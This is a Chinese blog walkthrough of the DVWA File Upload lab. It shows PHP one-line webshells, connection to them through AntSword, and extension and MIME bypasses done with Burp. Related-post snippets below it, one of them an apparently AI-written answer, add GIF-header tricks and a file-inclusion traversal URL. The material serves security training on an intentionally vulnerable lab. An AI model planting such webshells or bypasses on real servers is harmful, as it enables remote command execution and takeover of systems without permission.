【DVWA】——File Upload(文件上传)

最新推荐文章于 2025-05-08 15:12:17 发布
最新推荐文章于 2025-05-08 15:12:17 发布
阅读量1.3k 收藏 14
点赞数 4
分类专栏: 渗透测试 文章标签: 测试 学习 笔记 安全测试 渗透测试 DVWA 文件上传
❗ 转载请注明出处 作者:HinsCoder 博客链接:https://blog.csdn.net/HinsCoder
本文链接:https://blog.csdn.net/hinscoder/article/details/142246098
版权

📖 前言:文件上传漏洞是由于对上传文件未作过滤或过滤机制不严(文件后缀或类型),导致恶意用户可以上传脚本文件,通过上传文件可达到控制网站权限的目的。

目录

🕒 1. Low

满足这三个条件,攻击者就能够成功入侵

  • 木马上传成功,未被杀;
  • 知道木马的路径在哪;
  • 上传的木马能正常运行(解析)。

没有任何限制,所以直接上传一句简短代码(一句话木马)即可

<?php @eval($_POST['csb']);
echo "vulnerable";
?>

在这里插入图片描述
在这里插入图片描述

接下来需要用到一款Shell控制工具——中国蚁剑

中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。简而言之,中国蚁剑是一款的shell控制端软件。

🔎 中国蚁剑

第一次安装项目需要先初始化,我们解压到下面的文件夹

AntSword-Loader-v4.0.3-win32-x64\antSword-master

初始化完成后打开,首先右键空白处,点击添加数据

在这里插入图片描述
将上传的URL添加进去

http://192.168.31.57:8080/hackable/uploads/webshell.php

在这里插入图片描述

密码就是刚才后门的密码:csb,测试连接成功后即可添加

在这里插入图片描述

双击该URL地址,可以看到起其目录文件信息,随后右键在此处打开终端

在这里插入图片描述

在这里插入图片描述

此时就可以随意输入指令,实现远控了。

🕒 2. Medium

在这里插入图片描述
可以看到,靶场对文件类型做了限制,只允许上传png、jpeg

此时我们可以把一句话木马改为png后缀

在这里插入图片描述

然后使用BP抓包,将文件后缀改成php

在这里插入图片描述

在这里插入图片描述
使用webshell连接同上。

OK,以上就是本期知识点“File Upload(文件上传)”的知识啦~~ ,感谢友友们的阅读。后续还会继续更新,欢迎持续关注哟📌~
💫如果有错误❌,欢迎批评指正呀👀~让我们一起相互进步🚀
🎉如果觉得收获满满,可以点点赞👍支持一下哟~

❗ 转载请注明出处
作者:HinsCoder
博客链接:🔎 作者博客主页

DVWA文件上传漏洞
sunshine1_0的博客
01-20 2047
文件上传漏洞 低级别 中等级别 高级别
DVWA文件上传
qq_62078839的博客
04-03 3795
LOW 直接上传小马,上传成功 使用phpinfo();验证小马的可用性 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'na..
DVWA-File Upload(文件上传)
简简的博客
02-02 566
本系列文集:DVWA学习笔记 文件上传漏洞通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 ###Low: 函数介绍: basename()函数返回路径中的文件名部分。 string basename ( string $path [, string $suffix ] ) 参数介...
DVWA保姆级通关教程--05文件上传
最新发布
m0_74020575的博客
05-08 1313
文件上传漏洞是Web安全中一种常见的漏洞,其本质是攻击者通过上传恶意文件(如脚本文件、木马、WebShell等)到服务器,绕过服务器的安全检测并被执行,最终实现远程命令执行、控制服务器或窃取数据等恶意操作。提示:以下是本篇文章正文内容,下面案例可供参考。
DVWA-文件上传File Upload
weixin_58954236的博客
08-20 1626
指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
DVWA靶场-----FIle Upload文件上传
m0_65712192的博客
11-14 4840
DVWA靶场-----FIle Upload文件上传
DVWA-File Upload(Medium)
七月_的博客
10-23 382
文章目录File Upload(Medium)代码分析 File Upload(Medium) 代码分析 ```php <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/u...
DVWAFile Upload文件上传
RexHa的博客
10-02 2917
文件上传原理: 黑客利用文件上传后服务器解析处理文件的漏洞上传一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。
DVWA——File Upload
qq_54448882的博客
11-09 3259
此文章仅供学习使用,请勿用作违法行为。 目录 简介 文件上传漏洞 Webshell(网页后门) 造成文件上传漏洞的主要原因 危害 Low 上传一句话木马 使用蚁剑连接 Medium 上传一句话木马 拦截信息改变上传文件类型 蚁剑连接 简介: 文件上传漏洞: 文件上传漏洞主要攻击web服务,有文件上传存在的地方都有可能存在文件上传的漏洞,但并不是所有地方都存在这个漏洞。漏洞是否存在取决于对方的代码的完整性,若某些验证代码存在疏忽,就很可能造成文件上传漏洞。例...
DVWA系列——File Upload文件上传
weixin_49340699的博客
12-12 1226
DVWA系列——File Upload文件上传)简介low级别源码分析上传木马打开中国菜刀进行连接medium源码分析破解思路high源码分析破解思路方法一方法二impossible 简介 File Upload文件上传漏洞,通常是由于对上传文件的类型内容没有进行严格的过滤检查使得可以上传webshell获取服务器权限,所以文件上传漏洞带来的危害也是毁灭性的。 low级别 源码分析 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are
Kali渗透测试DVWA系列10——File Upload(文件上传)
浅浅的博客
06-14 6237
一、File Upload文件上传) 1、文件上传原理 File Upload,即文件上传漏洞。通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。简单点说,就是用户直接或者通过各种绕过方式将 webshell 上传到服务器中进而执行利用。 2、文件上传漏洞前提条件...
DVWA——文件上传
m0_74426634的博客
04-07 1179
大部分的网站和应用系统都有上传功能,一些文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型,导致允许攻击者向某个可通过Web访问的目录上传任意PHP文件,并能够将这些文件传递给PHP解释器,就可以在远程服务器上执行任意PHP脚本。当系统存在文件上传漏洞时攻击者可以将病毒、木马、WebShell、其他恶意脚本或者是包含了脚本的图片上传到服务器,这些文件将对攻击者后续攻击提供便利。根据具体漏洞的差异,此处上传的脚本可以是正常后缀的PHP、ASP以及JSP脚本,也可以是篡改后缀后的这几类脚本。
代码审计——DVWA File Upload文件上传
z1756227332的博客
03-10 439
Low等级代码 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES...
DVWA 文件上传
m0_56107268的博客
04-30 2163
Low File Upload Source vulnerabilities/upload/source/low.php <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILE..
5、DVWA——文件上传
qq_55202378的博客
09-11 1458
DVWA 文件上传
DVWA--file upload文件上传
weixin_50342860的博客
08-23 1580
目录风险lowmediumhigh总结 风险 对上传的文件类型,内容没有进行严格的过滤、检查,使攻击者可以上传木马获取服务器webshell权限。 low 查看代码,对上传文件没有做任何的过滤措施 basename(path,suffix)函数:点这里 全局数组 $_FILES: 点这里 move_uploaded_file() 函数:点这里 1. 写一句话木马1.php上传 <?php @eval($_POST['hello']); ?> 2. 上传成功,给出了上传文件路径,访问获
DVWA文件上传File Upload
qq_39682037的博客
03-21 2719
文件上传File Upload) Security Level: low 源码 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; ...
DVWA-文件上传upload
Cwillchris的博客
10-28 2247
实验环境: DVWA靶机:172.16.12.10 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: 一、Low级 1、查看源码及分析 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? //文件的目标路径hackable/uploads/,也就是文件上传的位置 $target_path = DVWA_WEB
DVWA(文件上传)
weixin_44023403的博客
12-06 474
DVWA文件上传文件上传File Upload)LowMedium 文件上传File Upload文件上传介绍: 文件上传漏洞通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 文件上传漏洞的利用的条件: 1.能够成功上传木马文件; 2.上传文件必须能够被执行; 3.上传文件的路径必须可知. Low 源码: <?php if( isset( $_POST[ 'Upload'
DVWA -File Upload fi
03-24
<think>嗯,用户想了解DVWA中的文件上传功能的安全测试或漏洞利用方法。首先,我需要回忆一下DVWA的基本情况。DVWA是一个用于练习Web应用漏洞的靶场,文件上传漏洞是常见的漏洞类型之一。用户可能需要从基础的上传恶意文件开始,逐步深入。 首先,安全测试通常包括绕过客户端验证。DVWA可能有不同安全等级的设置,比如Low级别可能只在前端做检查,而High级别可能有更严格的后端验证。例如,在Low级别下,用户可以直接上传PHP文件,因为服务器可能没有验证文件类型或内容。这时候需要指导用户如何修改前端代码,比如删除JavaScript验证,或者使用Burp Suite拦截请求修改文件类型。 接下来是绕过MIME类型检查。服务器可能会检查Content-Type,比如image/jpeg。这时候需要将恶意文件的Content-Type改为允许的类型,这可能通过Burp Suite修改请求头来实现。 然后是绕过扩展名检查。有些服务器通过黑名单来阻止危险扩展名,但可能遗漏某些情况,比如.php5、.phtml等。用户可以尝试上传这些变种扩展名,或者利用双扩展名如test.php.jpg来绕过检查。 对于内容检查,服务器可能检测文件头,比如GIF文件的GIF89a标识。用户可以在恶意文件前添加这些标识,伪装成图片文件,同时保留PHP代码。这需要一定的混淆技巧。 在漏洞利用方面,上传Web Shell是常见方法,比如使用一句话木马<?php system($_GET['cmd']); ?>,然后通过浏览器访问该文件执行系统命令。结合其他漏洞如文件包含漏洞,可以进一步利用,比如通过路径遍历上传文件到非预期目录,或者利用本地文件包含执行上传的恶意文件。 防御措施方面,应该提到白名单验证、重命名文件、存储文件到非Web目录、使用安全扫描工具等方法。例如,引用中的nikto工具可以用来检测常见错误配置,而sqlmap用于SQL注入测试,但文件上传漏洞可能需要其他工具。 需要确保用户理解不同安全等级(Low、Medium、High)的差异,并针对不同等级给出具体方法。例如,High级别可能需要更复杂的绕过技巧,比如结合服务器解析漏洞。同时,提醒用户注意法律和道德规范,仅在授权环境下测试。 最后,生成的相关问题需要覆盖漏洞原理、工具使用、防御措施和结合其他漏洞的情况,确保全面性。需要检查引用中的资料是否相关,比如引用3提到的nikto可以用来检查配置错误,引用4的sqlmap可能与文件上传无关,但用户的问题可能涉及综合测试。</think>### DVWA文件上传漏洞安全测试与利用方法 --- #### 一、漏洞原理 DVWA文件上传功能存在未严格验证文件类型、内容及路径的风险,攻击者可上传Web Shell(如PHP恶意文件)实现远程代码执行[^1]。漏洞等级分为低、中、高三种安全模式,对应不同防御强度。 --- #### 二、安全测试步骤 1. **基础文件上传测试** - **低安全级别**:直接上传`.php`文件(如`shell.php`),验证服务器是否允许执行 ```php <?php system($_GET['cmd']); ?> ``` - **绕过客户端验证**:禁用JavaScript或修改前端代码删除文件类型检查[^5] 2. **绕过MIME类型检查** - 使用Burp Suite拦截请求,将`Content-Type: application/php`改为`image/jpeg`[^3] 3. **绕过扩展名黑名单** - 尝试`.php5`、`.phtml`或双扩展名如`shell.php.jpg` 4. **绕过内容检查** - 在PHP文件头部添加图片标识(如`GIF89a`),伪装成图片: ```php GIF89a <?php system($_GET['cmd']); ?> ``` --- #### 三、漏洞利用示例 1. **Web Shell执行命令** - 上传成功后访问`http://靶机地址/hackable/uploads/shell.php?cmd=whoami`,可返回当前系统用户[^4] 2. **结合文件包含漏洞** - 若存在LFI漏洞,通过路径遍历执行上传文件: ``` http://靶机地址/vulnerabilities/fi/?page=../../uploads/shell.php ``` --- #### 四、防御措施 1. 使用白名单验证文件扩展名和MIME类型 2. 重命名上传文件(如`md5(时间戳).jpg`) 3. 将文件存储在非Web可访问目录[^2] 4. 部署WAF或使用`nikto`扫描检测配置错误[^3] ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值